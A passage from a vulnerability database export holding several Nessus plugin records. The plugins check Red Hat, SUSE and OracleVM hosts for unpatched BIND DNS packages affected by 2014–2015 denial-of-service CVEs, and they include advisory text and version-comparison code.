script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0079\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8000\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.6\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0079\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"bind-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"bind-chroot-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-chroot-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"bind-debuginfo-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"bind-devel-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", reference:\"bind-libs-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"bind-sdb-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-sdb-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"i686\", reference:\"bind-utils-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"s390x\", reference:\"bind-utils-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"6\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.30.rc1.el6_6.4\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:44:33", "description": "This update for bind fixes the following issues :\n\nCVE-2015-8000: Remote denial of service by mis-parsing incoming responses. (bsc#958861)\n\nCVE-2015-5722: DoS against servers performing validation on DNSSEC-signed records. (bsc#944066)\n\nCVE-2015-5477: DoS against authoritative and recursive servers.\n\nCVE-2015-8704: Specific APL data could trigger a crash. (bsc#962189)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-01-26T00:00:00", "type": "nessus", "title": "SUSE SLES10 Security Update : bind (SUSE-SU-2016:0227-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-libs", "p-cpe:/a:novell:suse_linux:bind-utils", "cpe:/o:novell:suse_linux:10"], "id": "SUSE_SU-2016-0227-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88178", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0227-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88178);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\", \"CVE-2015-8704\");\n\n script_name(english:\"SUSE SLES10 Security Update : bind (SUSE-SU-2016:0227-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for bind fixes the following issues :\n\nCVE-2015-8000: Remote denial of service by mis-parsing incoming\nresponses. (bsc#958861)\n\nCVE-2015-5722: DoS against servers performing validation on\nDNSSEC-signed records. (bsc#944066)\n\nCVE-2015-5477: DoS against authoritative and recursive servers.\n\nCVE-2015-8704: Specific APL data could trigger a crash. (bsc#962189)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939567\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=944066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=958861\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=962189\"\n );\n # https://download.suse.com/patch/finder/?keywords=6c9cd85bd7aa9140126fe2cf192d0ac0\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9fb3daf0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5477/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5722/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8000/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8704/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160227-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c36687c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-chrootenv-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-devel-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-doc-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-libs-9.6ESVR11P1-0.18.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"bind-utils-9.6ESVR11P1-0.18.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:09", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - Fix (CVE-2015-5477)\n\n - Fix (CVE-2015-4620)\n\n - Resolves: 1215687 - DNS resolution failure in high load environment with SERVFAIL and 'out of memory/success' in the log\n\n - Fix (CVE-2015-1349)\n\n - Enable RPZ-NSIP and RPZ-NSDNAME during compilation (#1176476)\n\n - Fix race condition when using isc__begin_beginexclusive (#1175321)\n\n - Sanitize SDB API to better handle database errors (#1146893)\n\n - Fix CVE-2014-8500 (#1171974)\n\n - Fix RRL slip behavior when set to 1 (#1112356)\n\n - Fix issue causing bind to hang after reload if using DYNDB (#1142152)", "cvss3": {"score": null, "vector": null}, "published": "2015-07-31T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : bind (OVMSA-2015-0105)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bind-libs", "p-cpe:/a:oracle:vm:bind-utils", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2015-0105.NASL", "href": "https://www.tenable.com/plugins/nessus/85146", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2015-0105.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85146);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2014-8500\", \"CVE-2015-1349\", \"CVE-2015-4620\", \"CVE-2015-5477\");\n script_bugtraq_id(71590, 72673, 75588);\n\n script_name(english:\"OracleVM 3.3 : bind (OVMSA-2015-0105)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Fix (CVE-2015-5477)\n\n - Fix (CVE-2015-4620)\n\n - Resolves: 1215687 - DNS resolution failure in high load\n environment with SERVFAIL and 'out of memory/success' in\n the log\n\n - Fix (CVE-2015-1349)\n\n - Enable RPZ-NSIP and RPZ-NSDNAME during compilation\n (#1176476)\n\n - Fix race condition when using isc__begin_beginexclusive\n (#1175321)\n\n - Sanitize SDB API to better handle database errors\n (#1146893)\n\n - Fix CVE-2014-8500 (#1171974)\n\n - Fix RRL slip behavior when set to 1 (#1112356)\n\n - Fix issue causing bind to hang after reload if using\n DYNDB (#1142152)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2015-July/000353.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind-libs / bind-utils packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind-libs / bind-utils\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T14:43:16", "description": "Updated bind packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.4 and 6.5 Advanced Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA denial of service flaw was found in the way BIND followed DNS delegations. A remote attacker could use a specially crafted zone containing a large number of referrals which, when looked up and processed, would cause named to use excessive amounts of memory or crash. (CVE-2014-8500)\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain malformed DNSSEC keys. A remote attacker could use this flaw to send a specially crafted DNS query (for example, a query requiring a response from a zone containing a deliberately malformed key) that would cause named functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain records with malformed class attributes. A remote attacker could use this flaw to send a query to request a cached record with a malformed class attribute that would cause named functioning as an authoritative or recursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive servers, however authoritative servers are at limited risk if they perform authentication when making recursive queries to resolve addresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477, CVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges Jonathan Foote as the original reporter of CVE-2015-5477, and Hanno Bock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2016-01-29T00:00:00", "type": "nessus", "title": "RHEL 6 : bind (RHSA-2016:0078)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "cpe:/o:redhat:enterprise_linux:6.4", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2016-0078.NASL", "href": "https://www.tenable.com/plugins/nessus/88479", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0078. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88479);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2014-8500\", \"CVE-2015-5477\", \"CVE-2015-5722\", \"CVE-2015-8000\");\n script_xref(name:\"RHSA\", value:\"2016:0078\");\n\n script_name(english:\"RHEL 6 : bind (RHSA-2016:0078)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.4 and 6.5 Advanced Update\nSupport.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA denial of service flaw was found in the way BIND followed DNS\ndelegations. A remote attacker could use a specially crafted zone\ncontaining a large number of referrals which, when looked up and\nprocessed, would cause named to use excessive amounts of memory or\ncrash. (CVE-2014-8500)\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nA denial of service flaw was found in the way BIND parsed certain\nmalformed DNSSEC keys. A remote attacker could use this flaw to send a\nspecially crafted DNS query (for example, a query requiring a response\nfrom a zone containing a deliberately malformed key) that would cause\nnamed functioning as a validating resolver to crash. (CVE-2015-5722)\n\nA denial of service flaw was found in the way BIND processed certain\nrecords with malformed class attributes. A remote attacker could use\nthis flaw to send a query to request a cached record with a malformed\nclass attribute that would cause named functioning as an authoritative\nor recursive server to crash. (CVE-2015-8000)\n\nNote: This issue affects authoritative servers as well as recursive\nservers, however authoritative servers are at limited risk if they\nperform authentication when making recursive queries to resolve\naddresses for servers listed in NS RRSETs.\n\nRed Hat would like to thank ISC for reporting the CVE-2015-5477,\nCVE-2015-5722, and CVE-2015-8000 issues. Upstream acknowledges\nJonathan Foote as the original reporter of CVE-2015-5477, and Hanno\nBock as the original reporter of CVE-2015-5722.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe update, the BIND daemon (named) will be restarted automatically.\"\n );\n # https://kb.isc.org/article/AA-01216\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01216\"\n );\n # https://kb.isc.org/article/AA-01272\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01272\"\n );\n # https://kb.isc.org/article/AA-01287\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01287\"\n );\n # https://kb.isc.org/article/AA-01317\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://kb.isc.org/docs/aa-01317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0078\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-8500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-8000\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", 